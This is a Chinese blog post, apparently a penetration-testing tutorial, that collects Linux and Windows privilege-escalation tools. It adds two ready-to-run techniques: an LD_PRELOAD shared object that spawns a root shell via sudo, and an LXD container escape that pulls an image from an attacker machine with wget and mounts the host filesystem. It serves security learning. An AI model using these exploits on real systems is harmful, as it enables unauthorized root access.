WEB渗透Linux提权篇-提权工具合集

 往期文章

WEB渗透Linux提权篇-环境变量提权-CSDN博客

工具合集

工具名称下载地址工具描述
BadPotatohttps://github.com/BeichenDream/BadPotatoWindows 权限提升 BadPotato
Databasetoolshttps://github.com/Hel10-Web/Databasetools一款用Go语言编写的数据库自动化提权工具,支持Mysql、MSSQL、Postgresql、Oracle、Redis
traitorhttps://github.com/liamg/traitorLinux自动提权
hacking8https://i.hacking8.com/tiquan/在线提权建议
PEASS-nghttps://github.com/carlospolop/PEASS-ngPEASS-权限提升令人敬畏的脚本套件
kernelpophttps://github.com/spencerdodd/kernelpopkernel privilege escalation enumeration and exploitation framework
Kernelhubhttps://github.com/Ascotbe/Kernelhubinux、macOS、Windows 内核提权漏洞集合,带编译环境、demo GIF 地图、漏洞详情、可执行文件(提权漏洞合集)
linux-exploit-suggesterhttps://github.com/The-Z-Labs/linux-exploit-suggesterLinux privilege escalation auditing tool
UACMEhttps://github.com/hfiref0x/UACME通过滥用内置的 Windows AutoElevate 后门来击败 Windows 用户帐户控制。 x86-32/x64 Windows 7/8/8.1/10/11(客户端,但某些方法也适用于服务器版本)
LinuxTQhttps://github.com/Getshell/LinuxTQLinux提权方法论
Linux-Exploit-Suggesterhttps://github.com/mzet-/linux-exploit-suggester将目标补丁级别与 Linux 漏洞进行比较 数据库,以检测目标上可能缺失的补丁
linux-kernel-exploitshttps://github.com/SecWiki/linux-kernel-exploitsLinux提权集合
windows提权集合https://github.com/SecWiki/windows-kernel-exploitswindows-kernel-exploits Windows平台提权漏洞集合
win-exp-suggesterhttps://github.com/klsfct/getshell/tree/master/win-exp-suggester将目标补丁级别与 Microsoft 漏洞进行比较 数据库,以检测目标上可能缺失的补丁
CoercedPotatohttps://github.com/hackvens/CoercedPotato通过在Windows 10、Windows 11和Server 2022上滥用SeImpersonatePrivilege特权可以从LOCAL/NETWORK SERVICE提升为SYSTEM。
dll_hijackhttps://github.com/JKme/sb_kiddie-/tree/master/hacking_win/dll_hijackdll劫持工具

 windows、Linux、Mac提权脚本整理:夸克网盘分享

 

一些检测工具

用于检查可执行文件属性的 bash 脚本(如 PIE、RELRO、PaX、Canaries、ASLR、Fortify Source)

https://github.com/slimm609/checksec.sh

枚举基本系统信息并搜索常见的权限提升向量,例如世界可写文件、错误配置、明文密码和适用的漏洞利用

http://www.securitysift.com/download/linuxprivchecker.py

检查文件权限、cron 作业(如果可见)、弱凭据等

https://github.com/rebootuser/LinEnum

提权脚本

https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

枚举工具

https://github.com/diego-treitos/linux-smart-enumeration
https://github.com/AlessandroZ/BeRoot
https://github.com/pentestmonkey/unix-privesc-check

Linux-Exploit-Suggester

https://github.com/mzet-/linux-exploit-suggester
https://github.com/PenturaLabs/Linux_Exploit_Suggester
https://github.com/jondonas/linux-exploit-suggester-2
https://github.com/belane/linux-soft-exploit-suggester

LD_Preload提权

  #include <stdio.h>
  #include <sys/types.h>
  #include <stdlib.h>
  void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/sh");
  }
>gcc -fPIC -shared -o shell.so shell.c -nostartfiles
>ls -al shell.so
>sudo LD_PRELOAD=/tmp/shell.so find
>id

Lxd提权

查看文件是否存在

>which lxd & >which lxc


攻击机

>git clone https://github.com/saghul/lxd-alpine-builder.git
>cd lxd-alpine-builder
>./build-alpine

搞个web服务提供下载

>python -m SimpleHTTPServer

靶机下载

>wget http://192.168.1.107:8000/apline-v3.10-x86_64-20191008_1227.tar.gz
>lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
>lxc image list
>lxc init myimage ignite -c security.privileged=true
>lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
>lxc start ignite
>lxc exec ignite /bin/sh
>id
  • 12
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值